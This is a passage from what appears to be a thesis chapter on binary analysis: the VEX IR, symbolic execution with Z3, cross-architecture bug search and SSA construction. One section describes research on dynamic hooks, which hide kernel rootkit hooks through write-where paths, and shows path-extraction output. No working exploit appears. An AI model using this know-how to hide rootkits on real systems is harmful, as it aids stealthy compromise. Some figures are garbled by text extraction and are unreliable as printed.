Each statement IRStmt stands on the left side of an assignment. Changes in the machine state, like memory stores and register assignments are realized and modeled through statements. On the right side of the assignment we have expressions (IRExpr) which do not change the state of the machine. They represent calculations, e.g., arithmetic operations or memory loads. These memory loads are typically assigned to a temporary variable and modeled by a WrTmp statement. Memory stores, register assignments or the assignment of temporary variables, each represent a specific type of assignment. VEX distinguishes between these types through statements. Thus, each statement tells us what kind of assignment or state change we are confronted with. Note that the notion of assignments are for visualization purposes. They are internally incorporated within the statement data structures of VEX. Analogous to the notion of basic blocks, a deterministic sequence of VEX-IR statements forms a single-entry, multiple-exit IR Super Block (IRSB). Figure 2.1 shows an excerpt of the grammar taken from [147]. The IR is well documented in the libvex_ir.h2. Each temporary variable has the static single assignment form (SSA). This property assures that each variable is defined once. SSA plays an important role for us and we discuss it in more detail in Section 2.3.2. However, the SSA code that we obtain statically from VEX has basic block granularity, i.e., the property only holds within the boundaries of an IRSB block. We summarize the essential elements of the VEX IR as follows:

• IRExpr: Data processing expressions

– Get: loads the value of a register that is specified by an index in a shadow table. – Load: loads the value at a given address. – RdTmp: Has the value of an IRTemp (a temporary variable). – {Un, Bin, Tri, Q}op expressions that receive 1 to 4 expressions respec- tively. Arithmetic or logical operations are processed. 2VEX/pub/libvex_ir.h 2. Foundations 13

IRStmt ::= IMark of Addr64 * Int * UChar | Put of Int * IRExpr | WrTmp of IRTemp * IRExpr | Store of IREndness * IRExpr * IRExpr | Exit of IRExpr * IRConst * IRJumpKind * Int | ...

IRExpr ::= Get of int * IRType | RdTmp of IRTemp | Qop of IROp * IRExpr * IRExpr * IRExpr * IRExpr | Triop of IROp * IRExpr * IRExpr * IRExpr * IRExpr | Binop of IROp * IRExpr * IRExpr | Unop of IROp * IRExpr | Load of IREndness * IRType * IRExpr | Const of IRConst | ...

REndness := LittleEndian | BigEndian

IRJumpKind :== Ijk_Boring | Ijk_Call | Ijk_Ret | .... Ijk_Trap | Ijk_Sys_syscall | .... | Ijk_Sys_sysenter

Figure 2.1: Excerpt of the VEX grammar taken from [147].

• IRStmt: IR instructions which can change the state of the machine

– Put: writes the value of an IRExpr to register specified by an index in the shadow table. – Store: writes the value of an IRExpr to memory. – WrTmp: assigns a IRExpr to an IRTemp.

In Figure 2.2 the VEX code for the x86 instruction mov eax, [esp+18h] is given. As we can see this single instruction is translated into several IR instructions which semantically do what the x86 instruction does. The first line uses the GET expression to get the value of register esp and writes it into a temporary variable. These temporary variables can also be seen as pseudo registers. The number 24 stands for a number that VEX uses to look up into a shadow table [152]. Each register has a unique number assigned to it in a shadow table for registers. In this case the number 24 stands for the esp register. Register eax and eip have the numbers 8 and 68, respectively. These numbers are also used in the PUT 14 2.2. Symbolic Execution: Steps with VEX

statement. The second line adds 0x18 to t2 which has the value of esp. What VEX does here, is to get the address to be loaded from ready in the temporary register t1. The next IR instruction loads from this address and writes to t2. Line 4 writes the loaded value into eax. The last line sets the instruction pointer to the next instruction. Many implicit processes that the x86 CPU does is expressed explicitly through the VEX IR. In particular, address computations as well as load and store operations to memory cells are made explicit.

1 t2 = GET:I32(24)

2 t1 = Add32(t2,0x18:I32)

3 t3 = LDle:I32(t1)

4 PUT (8) = t3

5 PUT(68) = 0x8048434:I32

Figure 2.2: IRSB for mov eax, [esp+18h].

2.2 Symbolic Execution: Steps with VEX

Similar to what is postulated by the UNIX philosophy, we pursue the goal to implement a system that serves a single purpose and seeks to do this right, which is checking for satisfiable paths. To ease our task we assume that a single path is given. This comes to an advantage as we do not have to handle the path explosion problem [177] which is one of the major problems that symbolic execution is susceptible to. As we will see in the next sections, this simple design choice helps us to solve some interesting problems which were incorporated in [207, 158].

Design

We present the design of our system in Figure 2.3. Given a trace of basic block addresses, we first gather all opcodes of each basic block by using IDA Pro in batch mode, load the binary, and start a rpyc server which exposes the Python API of IDA Pro 1 . These functionalities are also incorporated by the authors of Pyvex in a tool called IDALink 3. Each basic block is lifted to an VEX IRSB block, which we process statement per statement 2 . Each statement is passed to an IRStmt-handler 3 which dispatches its type 4 , extracts the VEX expressions and passes each expression to an IRExpr-handler 5 . This handler processes the expressions along their abstract syntax trees (AST) and transforms them into expressions that can be

3https://github.com/zardus/idalink 2. Foundations 15

Basic Block Trace 1 IDA PRO 2 VEX IRSB 3 8 4 PUT State update state IRStmt Handler STORE check type WRTmp Memory CPU ... 5 Store Load select 7 IExpr Handler

6

Z3 Formula S-Expression

Figure 2.3: Overview of our architecture for symbolic execution and evaluation.

processed by an SMT solver, which is the Z3 4 in our design 6 . Through its API, Z3 formulas can easily be transformed into S-Expressions (symbolic expressions) which are lisp-like expressions, particularly convenient to parse. The formulas are additionally simplified before the IRExpr-handler passes the formulas back to the IRStmt-handler 7 . The IRStmt-logs memory store and load events as well as CPU register events. On the statement level we then have all the information we need to build/update a state 8 . With state, we refer to the CPU and memory state, each of them updated in terms of Z3 expressions. Each block of the trace that is passed in the order of its execution within the trace, updates the memory and register states and yields the foundation of its symbolic execution. At branch sites we pass the path conditions to Z3 and check for its satisfiability. We now sketch the notion of an abstract environment (AbsEnv) to formally represents a symbolic state of current register and memory values. The whole memory in our system is represented as one global Z3 array that maps bitvectors to bitvectors. An AbsEnv maps each register and memory access to a Z3 formula over bitvectors: 4https://github.com/Z3Prover/z3 16 2.2. Symbolic Execution: Steps with VEX

Figure 2.4: Execution using abstract environments.

VEX-IL Execution: AbsEnv → AbsEnv e = AbsEnv[esp] t2 = Get(24) AbsEnv[t2] = e e = AbsEnv[t2] = esp t1 = Add32(t2, 0x18 : I32) e0 = e + 0x18 = esp + 0x18 AbsEnv[t1] = e0 e = AbsEnv[t1] t3 = LDle : I32(t1) e0 = µ[t1] = [esp + 0x18] AbsEnv[t3] = e0 e = AbsEnv[t3] PUT (8) = t3 AbsEnv[eax] = e PUT (68) = 0x8048434 : I32 AbsEnv[eip] = 0x8048434

AbsEnv = (Z3Expr → Z3Expr) × (µ : Z3Expr → Z3Expr)

Note that temporary variables in VEX are also treated as registers. A symbolic execution of each IR statement is interpreted in terms of Z3 expressions and the AbsEnv gives us the current state of the execution. Figure 2.4 shows the interpreted execution of the instruction mov eax, [esp+18h] which we translated into VEX-IR as shown in Figure 2.2. To get a better understanding of the VEX-IR to Z3 routine, let’s look at the statement in the second line of Figure 2.2. Here we are dealing with a WrTmp statement. Linked to this statement we have the Add32(t2,0x18:I32) expression of type Binop which further incorporates t2 of type RdTmp and 0x18 of type Const. The IRExpr-handler traverses the AST of these expressions and builds two Z3 bitvectors and a recipe for the IRStmt-handler. This recipe tells the handler how to cope with the expressions. In this case it tells the handler to add the two bitvectors. The statement handler then updates the abstract environment as shown in Figure 2.4. More specifically, the handler evaluates each temporary variable in the present execution context. The semantics are faithful to the assembly language. Our architecture builds the foundation for:

• Cross-Architecture Bug Search in Binary Executables [158]

• Dynamic Hooks [207]

In the following we describe its role in more detail. 2. Foundations 17

2.2.1 Cross-Architecture Basic Block Semantics

Software on embedded devices is usually closed-source and implemented in an unsafe language. A study of VDC Research indicates that not only due to release pressures more and more third party software is used, but it is also getting common practice [83]. Furthermore, vendors use the same code base to compile firmware images for different devices with varying CPU architectures. In recent years open source software has gained popularity in this regard and is a major source in third party code re-use. As a consequence the software gets adapted, might not have the latest patches and gets no maintenance on the device. This scenario is not uncommon and has a weakness number assigned to it, CWE-1104 which stands for “Use of Unmaintained Third Party Components”[62]. It gets traction, particularly due to the increasing number of devices induced by the IoT revolution. Note that many of these software—open source components or not—are compiled to binaries that have stripped symbols and contain no information about function names or types. This is the landscape that inspired us to pursue the following question: if several firmware images re-use the same code that happens to have a security bug, how can we re-find those bugs, not only in different images but also in different images across architectures? In other words, if software has a bug in its ARM image, can we find it in another software on another architecture? We defined the process of re-finding with a similarity based approach. The problem to solve is to formulate a bug signature and find similarities of it in other binaries. As we know binary code is challenging: some of the program semantics can be lost during the compilation, as well as function names, comments, data- structures, and data types. For a similarity based approach—and especially with respect to a cross-architecture similarity—binaries raise the bar because code can be compiled with different optimization levels, with different compilers, different operating systems for different architectures. Thus, a reasonable way to tackle this problem has to involve semantics. Semantic similarity captures the effects of the code to the processor and memory states. The next question that arises is how to efficiently capture these semantics. It is here, where our engine we presented in the previous section plays its strengths. To make a cross-architecture comparison, we need a common ground. This common ground is the IR stage which translates each assembly instruction into VEX and from VEX into a formula. Each formula is updated with respect to the local execution scope of the basic block. In other words, we execute the basic block as described in the previous section, and after a basic block is processed, the 18 2.2. Symbolic Execution: Steps with VEX register and memory context is reset. The context is extracted as a sequence of formulas, each represented by easy to parse S-Expressions. In Figure 2.5 we present two basic blocks for x86 and Armv7, respectively, both of which represent the same lines of code in busybox 1.20. The upper row shows a verbose disassembly of IDA PRO, the row below the disassembly shows each block represented by a sequence of S-Expressions. The formulas describe how the input variables influence the output. This representation is a semantic summary of the basic block. For instance, based on the ARM code, we take the value of register R12 into consideration. The formula for R12 is: (= R12 (bvadd #xfffffff0 (select MEM (bvadd #x0000052c SP))))

With MEM we have one global Z3 array that represents the memory and explicitly indicates its access here. The formula stands for -16 + MEM[0x52c + SP] which summarizes the course of actions on R12 in the local scope of the basic block. These actions are performed at 0x00086DA8, and 0x00086DB4 in the ARM code. At 0x00086DCC the value of R12 is written to the stack. This instruction is represented by the last four lines of the S-Expression block. The value for R12 is directly inlined in this assignment. These three instructions are equivalent to the x86 at 0x080D051C. While we saw the nature of a load and store architecture with the ARM code, here we have one of the complex instructions that x86 allows, arithmetic with memory expressions. The following formula represents the value stored at the corresponding stack address: (store MEM_BB (bvadd ESP #x0000052c) (bvadd #xfffffff0 (select MEM (bvadd #x0000052c ESP))))

The formula stands for -16 + MEM[0x52c + ESP] whose values is stored to MEM_BB[0x52c + ESP]. With MEM_BB, we explicitly indicate that the store happens within the scope of the current block and make it easier to parse memory stores as outputs in the formula, otherwise it is equivalent to MEM. Both formulas have one output which are R12/MEM_BB, and two inputs which are ESP/SP and the memory dereference. These formulas already show high similarity. Since we are only interested in the final value of the dereference, we treat the formula as if it has one input only, the memory value. This also applies for nested memory expressions in which case we flatten it to one input. The basic blocks formulas build the foundation for the next steps that we briefly summarize. 2. Foundations 19

The next steps focus on the semantics of each basic block. The semantics are derived by sampling, i.e., take values from a given range, substitute them with the inputs in the formula, and store the input output pairs. The standard metric of similarity is the Jaccard similarity index. To quickly get estimates of the Jaccard index, the resulting input and output pairs are hashed by locally sensitive hashing, more specifically, MinHash. The MinHash algorithm uses a variety of hash functions, repeatedly applies them on each element of a set, and takes the minimum hash value. The probability that two hashes are equal is the Jaccard index and with an increasing number of hashes we get a better estimate that is close to the index. One of the enhancement of this technique that are proposed in our joint work [158] involves grouping each formula by their inputs, sampling them, and hashing their I/O pairs. This is the essence of what is called Multi-MinHash. It has the benefit that formulas with fewer inputs are not underrepresented. Once the hashes are computed, we have the foundation to approach a cross- architecture similarity matching: A bug signature that can span several basic blocks or a single block runs through the pipeline we have presented along with the binary to be matched against. The target binary can be of any architecture for which we support the transformation to the common IR stage. A greedy algorithms then moves from one best match to another along the control flow of signature and target ranking the matches by their similarity score. For the details and the empirical study on how this is successfully achieved, especially in accordance to Multi-MinHash and k-MinHash, we refer the reader to [158]. In fact this work is the first to tackle the problem of cross-architecture bug search.

At this point we want to refer back to our example: The example we have chosen here also shows the shortcomings of the basic block granularity. In the ARM code of Figure 2.5 we see at 0x00086dac that 0xffff is loaded into R4. We cannot see any instruction in the x86 code that does a similar computation. In fact, the computation is done in a basic block that is one block away of the current one. The compiler has reordered the instructions for better performance. As a consequence, the basic block similarity drops. However, as long as such a reordering does not affect many formulas, and considering that most of the other formulas are strong witnesses that contribute to the similarity, the drop has not a big impact on the overall similarity ranking. 20 2.2. Symbolic Execution: Steps with VEX (bvnot (select MEM #x0008751c)))))) (select MEM (bvadd #x0000052c SP)))) (select MEM (bvadd #x0000052c SP)))) (bvadd(bvadd #x0000052c #xfffffff0 SP) jump_addr: 0x86dd4 (= R4 (select MEM(= #x0008751c)) R5(= a !1)) R12 (bvadd(= #xfffffff0 R1(= (concat R2(= R5) #x0000 R3(= #x00000010) ((_ PC(= extract #x000866f8) LR(= 31 #x00086dd4) R0 16) (select R0))) MEM (bvadd #x00000024 SP))) (let ((a!1 (bvnot (bvor (bvnot R0) (store MEM_BB Belongs to Function inflate_unzip_internal 0x86bd8 00086DA800086DAC LDR00086DB0 LDR00086DB4 MOV R12,00086DB8 SUB [SP,#0x560+my_bd] R4,00086DBC MOV =0xFFFF LR,00086DC0 MOV R0 R12,00086DC4 LDR R12, R1,00086DC8 MOV #0x10 R0,LSR#16 R2,00086DCC AND R5 R0,00086DD0 STR [SP,#0x560+var_53C] R3, BL #0x10 R5, LR, R12, R4 [SP,#0x560+my_bd] fill_bitbuffer Basic Block 0x86da8Basic Block size 44 x86 ARMv7 : Basic blocks representing the same lines of code and their corresponding summaries in S-Expression form. Armv7 vs (select MEM (bvadd #x0000052c ESP)))) x86 (bvadd(bvadd ESP #x0000052c) #xfffffff0 jump_addr: 0x80d053c (= EIP(= #x080d0017) EAX(= (select ESP(= (bvadd MEM EDX(= (bvadd (concat #xfffffffc ESI(= #x0000001c (concat #x0000 ECX ESP)) EBX) #x0000 ((_ ESP))) extract EAX)) 31 16) EAX))) (store MEM_BB (store(store MEM_BB ESP MEM_BB #x00000010) (bvadd #xfffffffc ESP) #x080d053c) x x x Belongs to Function inflate_unzip_internal 0x80d0381 Basic Block 0x80d051aBasic Block size 34 080D051A080D051C mov080D0524 sub080D052B mov ecx,080D052E movzx ebx [esp+54Ch+m],080D0531 shr [esp+54Ch+required],080D0533 esi, mov 10h ax 080D0537 mov eax, 10h call 10h edx, eax eax, fill_bitbuffer [esp+54Ch+state] Figure 2.5: 2. Foundations 21

2.2.2 Path Extraction for Dynamic Hooks

Diverting control flow via hooks is a well known and established technique, not only applied by malicious code, but also applied for monitoring purposes. The techniques have a long history, and undergo a cat and mouse game between malware authors and detection systems. This project, driven by the work of Sebastian Vogl, introduced a new technique for hiding hooks which is referred to as dynamic hooking. Here, a hook is placed within non control data. The dynamic aspect comes with the actual execution of certain paths that trigger the hook. The idea is to manipulate data structures in such a way that a hook is triggered whenever legitimate functions operate on the data structure. For instance, it is possible to alter a list data structure in such a way that a function that follows a program path to delete that element from the list writes to an arbitrary location, such as the return address. Thus, when the function returns, the hook gets triggered. In [207] we have shown how effective such hooks can be applied to hide rootkits in the kernel. Both Windows and use the Global Segment Register (GS) to store important global variables. In Linux 3.8 64-bit the task_struct resides at GS:0xc740. The idea is to find both, source and sink registers that originate from a fixed address or the region pointed to by the GS register in which case we achieve a write-where primitive. A path that leads us to such a primitive is considered to be exploitable by an dynamic hook. We refer the reader to [207] for the details. In what follows, we describe the path validation and extraction process achieved by the engine we presented in the previous section.

For the path extraction, our engine is extended with a backward slicer. Static program slicing is a well known technique, originally proposed by Mark Weiser [211]. The key idea is to extract all instructions in the program that may affect the value

of sink variables. Starting from a potential 8-byte write of the form mov [regx],

regy, the backward slicer traverses the CFG backwards for both regx and regy, respectively. When a call node is hit, it pushes the current context onto a stack and follows the call. Usually the control flow graph (CFG) is annotated with use-def chains. A use-def chain is a data structure that maps a single use to all definition that reach the use. By traversing these chains, i.e., processing each use-def chain of each definition and repeating this process, each address is put into the slice. Precise slicing usually incorporates a data structure called control dependence graph (CDG) which is used to account for guarding expressions, i.e, expression that guard a branch. The data structure is particularly useful for revealing dependencies that are not data dependent. We present the foundation on how to build these graphs in the course 22 2.3. A suitable IL of the next sections of this chapter. However, the approach we follow here refrains from using the CDG. This is due to the fact that we construct full paths from a sink back to its source where we run through the guards as well. The sole purpose for the slicer is basically to get the data dependency between the sink and the source. The computation approach that we followed has an on demand character, where we only work on the CFG. While traversing the CFG backwards, we check each basic block locally for use-def chains. At the same time we also keep track of the paths we are following. A threshold of 500 basic blocks limits the path length. We process the CFG until we hit a GS register through the slice or stop at a stack location. Each path is a potential trigger of a dynamic hook. The paths that are generated by the slicer need to undergo a validation process through symbolic execution. In Figure 2.6 we show the slice and the full path that we extracted and which leads into the source, gs:188h. The slicer begins at [r8+70h], rdx, finds the data dependency to the source we are seeking and constructs the path to it. This path is validated for satisfiability by our symbolic execution engine; it validates the slice and constructs a formula for the paths to be taken. The symbolic execution engine reveals, in particular, how the values are controlled. For instance, the rdx at 0x1400c0bfe is controlled through a multilevel chain of memory dereferences starting at the source, gs:188h. The engine also reveals that the jump is not taken and the condition for it to proceed is that the value at rcx + 0x118 = 0. The path is satisfiable and in [207], Vogl et al. show how it used to trigger dynamic hooks. For more information on how many paths we generated and solved for the purpose of dynamic hooks, please refer to our collaborated work [207].

2.3 A suitable IL

At the beginning of this chapter we spoke about the role of a proper IL. There are a variety of such intermediate languages. Each comes with its strength and proper usecases. Some systems avoid the lifting of binary code and run the code on bare metal trading portability with performance. Qsym [216] and Triton [174] are such systems which are based on dynamic binary translation. The role of an IL can not only affect the execution speed, but also the complexity of SMT queries. This insight is evaluated in a recent work by Poepleau et al. [159]. For us execution speed and queries play a secondary role when it comes to an IL. Our primary purpose is to ease program analysis and be close to bare metal. This is motivated by the experience we made with McSema [68], a work that aims to lift binaries to LLVM. It is seductive to have acccess to the immense amount of passes 2. Foundations 23

----slice----- 0x00000001400c0bd0 mov rax, gs:188h 0x00000001400c0bd9 mov rcx, [rax+70h] 0x00000001400c0be7 mov rax, gs:20h 0x00000001400c0bf0 mov r8, [rax-180h] 0x00000001400c0bf7 mov rdx, [rcx+108h] 0x00000001400c0bfe mov [r8+70h], rdx

---FULLPATH----- 0x00000001400c0bd0: mov rax, gs:188h 0x00000001400c0bd9: mov rcx, [rax+70h] 0x00000001400c0bdd: cmp qword ptr [rcx+118h], 0 0x00000001400c0be5: jz short locret_1400C0C17

0x00000001400c0be7: mov rax, gs:20h 0x00000001400c0bf0: mov r8, [rax-180h] 0x00000001400c0bf7: mov rdx, [rcx+108h] 0x00000001400c0bfe: mov [r8+70h], rdx Symbolic Execution Output:

[*] Jump Condition in: BB_0x1400c0bd0 [*] MEM[RCX + 0x118] - 0x0 == 0x0 [*] Jump is not taken

CPUCONTEXT/CONTROLLEDREGISTERS RCX -> MEM[MEM[0x188 + GS] + 0x70] RAX -> MEM[0x188 + GS] ------

PATH END in BB_0x1400c0be7

CPUCONTEXT/CONTROLLEDREGISTERS R8 -> MEM[MEM[0x20 + GS] + 0xfffffffffffffe80] RCX -> MEM[MEM[0x188 + GS] + 0x70] RDX -> MEM[MEM[MEM[0x188 + GS] + 0x70] + 0x108] RAX -> MEM[0x20 + GS]

LASTMEMWRITE: SRC -> RDX DEST -> R8 + 0x70 ------OUTPUT-FOR-PARSER------

[*] Jump Cond -> MEM[RCX + 0x118] - 0x0 == 0x0 [*] Simplified Cond -> MEM[0x118 + RCX] == 0x0

Figure 2.6: Slice/Path extraction and output of Symbolic Execution. 24 2.3. A suitable IL that come with LLVM. However, many of them are designed for source code analysis and use specific metadata that come with the LLVM toolchain. We experienced that we loose track to the instructions of the binary. One of our demands is to pinpoint the instructions that caused a bug. With an IL that is close to the original assembly language we see this achieved conveniently. In fact, the BAP IL (BIL) [30] follows this approach. Furthermore, it eases the debugging and the triaging process. Another desire for us is the incremental nature, i.e., be able to extend the IL without breaking analysis procedures. A new expression introduced into the IL should interact transparently with the present set of expressions. We summarize our wishlist for an IL as follows:

• Eased lifting and support to add new architectures.

• IL extensions: manipulate statements and expressions; support to integrate new ones into the system. The new expressions have to interact transparently with the present set of statements/expressions.

• Serialization: being able to access the whole AST of statements and serialize specific parts of it.

• Make static program analysis approachable.

None of the above points is suported by VEX naturally. The comparison to VEX is, in fact, unfair, since it is not designed for static program analysis. Implementing the functionalities comes with cumbersome technical challenges. However, it is worth mentioning that some of them are, by now, solved by contributions to the Angr project. To our suprise, we found a framework that fulfills most of our demands in a natural way. Our choice fell for Amoco [198]. It fulfills our wishlist and gives us an instrument to built on. We extended its IL with expressions to support static single assignment (SSA), recognize customs opcodes, and made further extensions on the expression side to fill our needs. In the course of this work we will cover all of our extensions. Figure 2.7 shows the grammar of the IL built on top of Amoco. The nonterminals are denoted as reg and cst where reg is a sequence defined by [a-zA-Z0-9_]+ and cst is an integer. The Slice expressions, represent different slices of each expression. For instance, in x86-64 the 32-bit general purpose register ebx can be represented as a slice of rbx:

ebx = rbx[0:32] 2. Foundations 25

It gives us an instrument to define overlaps. For instance, let’s assume that the lower 4 bytes of the x86-64 register rbx is edx, and the higher 4 bytes are the higher 4 bytes of rax. In fact, Amoco has a compound-expression defined for this. We basically have rbx to be a compound of edx and eax which is modelled by:

rbx = rdx[0:31] <+> rax[32:63]

The <+> operator is an operator that stitches (concatenates) both operands into a larger operand. For a Slice-expression, the lifter has to explicitly check that i ≥ 0, j < register_size, i > j holds, where i and j are the lower and upper bound, respectively. The TST-expression models an if-then-else expression which uses the ternary operator . The left-hand side of a statement is either a register or a memory expression. This is enforced by the lifter. Memory expressions on the left-hand side are considered as memory stores, and apparently each memory expression on the righ-hand side is a memory load. The semantics are faithful to the assembly language.

Program ::= Statement {, Statement} Statement ::= reg ← Expression | Mem ← Expression

Expression ::= reg | cst | Ptr | Mem | Phi | Slice | TST | BinOp | (Expression) | BOOL Mem ::= Msize Ptr Ptr ::= reg + cst | cst Slice ::= Expression[i:j] RegList ::= reg {, reg} Phi ::= φ( RegList ) TST ::= BOOL : ? Expression : Expression BOOL ::= Expression REL Expression Compound ::= Slice <+> Slice BinOp ::= Expression OPERATOR Expression REL ::= < | > | <= | >= | == | ∧

Figure 2.7: SymIL Grammar.

Mentalese is divided into a frontend and backend. The frontend utilizes Amoco to lift the binary into SymIL, and transform it into our IR. Figure 2.8 illustrates the translation of an ARM assembly into SymIL which has the SSA form. In the next chapter we cover this translation process and our adaption of SSA. 26 2.3. A suitable IL

———————0x584e4———————- ———————0x584e4———————- ldr r3 , [r0,#0] r3_4 ← M32(r0) str r3 , [r0,#4] M32(r0+4) ← r3_4 mov r3 , 0x0 r3_5 ← 0 str r3 , [r0,#0] M32(r0) ← r3_5

Figure 2.8: ARM Code to SymIL.

2.3.1 Dataflow Essentials

The execution of a program can be seen as a sequence of state transformations from one program point to another. We differentiate between program points before a statement and after a statement is executed. These points are referred to the input and output state, respectively. A body of techniques that helps us to reason about state transformations with respect to information flow inside the program, comes with dataflow analysis. Dataflow analysis is concerned with summarizing how these input and outputs states change over all possible paths in the control flow graph of the program. For the sake of simplicity we refer to a program point before a statement as the program point before we enter a basic block and likewise we refer to a program point after a statement with a point after the basic black is executed. We denote these points by IN[BB] and OUT[BB], respectively. The basic schema involves transfer functions which describe how information is passed from one program point to another. We clarify this concept with one of the fundamentals in dataflow analysis known as reaching definition. As the name suggests, reaching definition reasons about variable definitions that may reach a program point along a path. Usually the direction of the information flow plays a role and is reflected by the transfer function. In our case we have a forward flow.

We define two sets genBB and killBB where genBB is a set of tuples of the form (variable, address) where a variable is defined in BB at some address. From the standpoint of the basic block BB each definition in BB invalidates (kills) all other definitions of the same variable. These definitions in form of (variable, address) tuples are elements of the killBB set.

With the definition of genBB and killBB we can now define the transfer function:

fBB(x) = genBB ∪ (x − killBB) (2.1)

where x is the set of definitions that reach BB. In our case x = IN[BB]. Recall that with IN[BB] we refer to the point before entering basic block BB, i.e., where all information from ancestor blocks basically meet at this point. The equation says 2. Foundations 27

that definitions generated in BB are joined with definitions that reach BB and are not killed. These are the values that are passed from BB to its successors. To build a reaching definition analysis we need:

OUT [BB] = fBB(IN[BB])) (2.2)

IN[BB] = ∪p=pred(BB)OUT [p] (2.3) A classic worklist implementation is shown in Figure 2.9. All basic blocks are initialized with the empty set. On line 6 and 7 we apply our equations. Line 8 checks if any change occurred to the OUT set of the current vertex v which is processed in the loop. If there is a change, it has an effect on all its successors, since IN set is now changed for the successors of v. Apparently, we have to process the successors again. This is handled on lines 9-12.

1 OUT[BB] = ∅, ∀BB ∈ V 2 worklist ← V 3 while ( worklist =6 ∅){ 4 v = pop(worklist) 5 old = OUT [v] 6 IN[v] = ∪p=pred(v)OUT [p] 7 OUT [v] = fv(IN[v]) 8 if(old =6 OUT [v]){ 9 ∀s = succ(v): 10 if(s∈ / worklist ) { 11 add s to worklist 12 }

13 }

14 }

Figure 2.9: Simple Worklist Algorithm.

The algorithm runs until a fixpoint is reached, i.e., no new changes are made to the OUT set which is guaranteed. In theory, the fixpoint is guaranteed if the transfer function and a so-called semilattice fulfill certain conditions. We refer the interested reader to [6] for more details on the theory. The reaching definition analysis is usually used to build a data dependency graph (DDG). Combined with a control dependence graph (CDG), a program dependence graph (PDG) is formed. The PDG has its classic use case in program slicing [101] or chopping [108]. In a modern approach, the PDG is combined with the AST and CFG to produce a code-property-graph (CPG) [213]. In a similar fashion as proposed by Reps et al. [168] to formulate program flaws as a graph reachability problem, Yamaguchi et al. model vulnerabilities as graph traversals through the CPG. 28 2.3. A suitable IL

With reaching definition we can also build so-called use-def-/def-use-chains.A use-def-chain (UD-chain) of a variable is basically a data structure that incorporates all definitions of that variable that reach a single use of that variable without any intervening definitions in between. Similarly, a def-use-chain (DU-chain) incorporates all uses of a variable that are reached by a single definition. These chains are invaluable for us and as we see throughout this chapter, they can be used as building blocks to formulate taint analysis, points-to, program slicing and even constant value propagation. Since we excessively use these chains, we need an efficient way to compute them. Ideally, we transform our program into a representative format which makes the computation easy. Fortunately, with static single assignment (SSA) we have such a format.

2.3.2 Static Single Assignment

Static single assignment (SSA) is a program transformation where each variable is defined once. SSA is a standard utilized by optimizing compilers as it eases the procedures immensely, and we refer the reader to common literature for more details about the optimization steps. In this section we set the stage for the frontend of our binary analysis framework and show how we benefit from SSA and the design of the algorithm we present. One of the invaluable benefits we have is that once the program is transformed, definition use relations become explicit. Each use is dominated by its definition. All we need is a look up. The algorithm needs some preliminary theory on some fundamental techniques in program analysis which we present in the following.

Definition 1. Let G = (V, E) be a CFG with entry node e. Consider two vertices a and b in V. If every path from e to b passes a, then a dominates b, and is written ab. The set of vertices dominated by a, {v|a  v} ∪ {a} is denoted as Dom(a). Each node dominates itself. If a =6 b, then a strictly dominates b and is denoted by a ≫ b.

Definition 2. Consider two vertices a and b with a ≫ b. Vertex a immediately dominates b iff any node z that strictly dominates b also strictly dominates a. We say that idom(a, b) ⇐⇒ a ≫ b ∧ ∀z : z ≫ b =⇒ z ≫ a.

By treating each idom(a, b) as an edge from node a to b, the immediate dominance relations gives us a hierarchical tree structure also known as the dominator-tree (Dom-Tree). We have seen how to formulate data flows in terms of transfer 2. Foundations 29

functions. A dominance relation can be formulated in a similar fashion as we did in the previous section:

fBB(x) = {x} ∪ BB (2.4)

OUT [BB] = fBB(IN[BB]) (2.5)

IN[BB] = ∩p∈pred(BB)OUT [p] (2.6)

As equation 2.6 suggests, we have a forward flow, i.e., values are propagated from predecessors to successors. We can use the same worklist arrangement as presented in Figure 2.9 to compute the dominance relation. However, some minor changes are needed to make that algorithm work for us. First, we initialize each OUT [BB] with V (all nodes in the CFG), i.e., substitute line 1. Note that the OUT [BB] set gives us the set of all basic blocks that dominate BB. This, in particular, means that OUT [e] = e where e is the entry node of the CFG. We incorporate equations 2.4 – 2.6 into the algorithm of Figure 2.9 by substituting the equations with lines 6 and 7. The algorithm has a worst case complexity of O(N 2). In practice, however, it turns out to perform well for CFGs. A more sophisticated algorithm which has linear complexity is given by the Lengauer Tarjan algorithm [125]. This algorithm, however, outplays its strengths on very large graphs. With the following definition of dominance frontiers, we have the last building block to present the SSA algorithm.

Definition 3. Let Dom(a) = {v|a  v}, be the set of all vertices dominated by a. Let succ(v) be the set of successors of v. Then the set {s ∈ succ(v)|v ∈ Dom(a) ∧ s∈ / Dom(a)} is called the dominance frontier of node a.

The intuition behind SSA is to give each assignment to a variable a new subscripted name. For instance, a subscripted name for a register r1 can be r1_1. All uses of r1 that reach an assignment have to be renamed as such. At join nodes, i.e., at nodes with in − degree ≥ 2, a so-called φ-function is inserted. As we usually have branches in programs and definitions might reach a join node from different branches, a mechanism is needed to model the selection of one of the definitions. Here the φ-function comes into play. This is best illustrated by the following example: 30 2.3. A suitable IL

...... a: rax_7 ← rax_6 + rbx_8 b: rax_9 ← rcx_6

c: rax_10 ← φ(rax_7, rax_9) ...

The definitions of registers rax_7 and rax_9 reach the join point at c. The φ- function indicates which definitions reach the join point. Subsequent uses of the rax register are now uses of rax_10.

φ-function placements

The question now arises how to place the φ-functions efficiently. We could group each assignment pair of the same variable and see if their definitions reach the same join point, place a φ-function there, add it to the group, since we have a new assignment and start again. In this manner we can iteratively, determine the join nodes with respect to each assignment. A trick proposed by Cytron et al. [63] to do this efficiently is the usage of dominance-frontiers. To make this clear, let’s suppose that we have the definition of some register r in node X. Each node that is dominated by X sees this definition. Eventually, we reach a node Z not dominated by X which means that there is another path to Z that bypasses X. Obviously, node Z is a join node and in demand of a φ-function for r. If node Z is the first node on the path from X that is not dominated by X then Z is in the dominance-frontier of X. We can place a φ-function at Z and continue on searching for nodes in the dominance-frontier of node Z. Cytron et al. [63] give proof that this iterative procedure gives us the desired join nodes for the placement of φ-functions. For the sake of clarity the algorithm for the placement of φ-functions is given in Figure 2.10. It is a variation of the original algorithm given by Cytron et al. [63] and adapted for our binary purposes. The algorithm first initializes the set of all IL- expressions which we denote as P ool by calling GetAllExpressions. This function basically runs over all basic blocks of the CFG and gives us all IL-expressions that are defined. The algorithm then runs over all expressions starting at line 4. The HasAlready set is used to keep track of nodes that have a φ-function already placed with respect to the currently processed expression. At line 7 the 2. Foundations 31

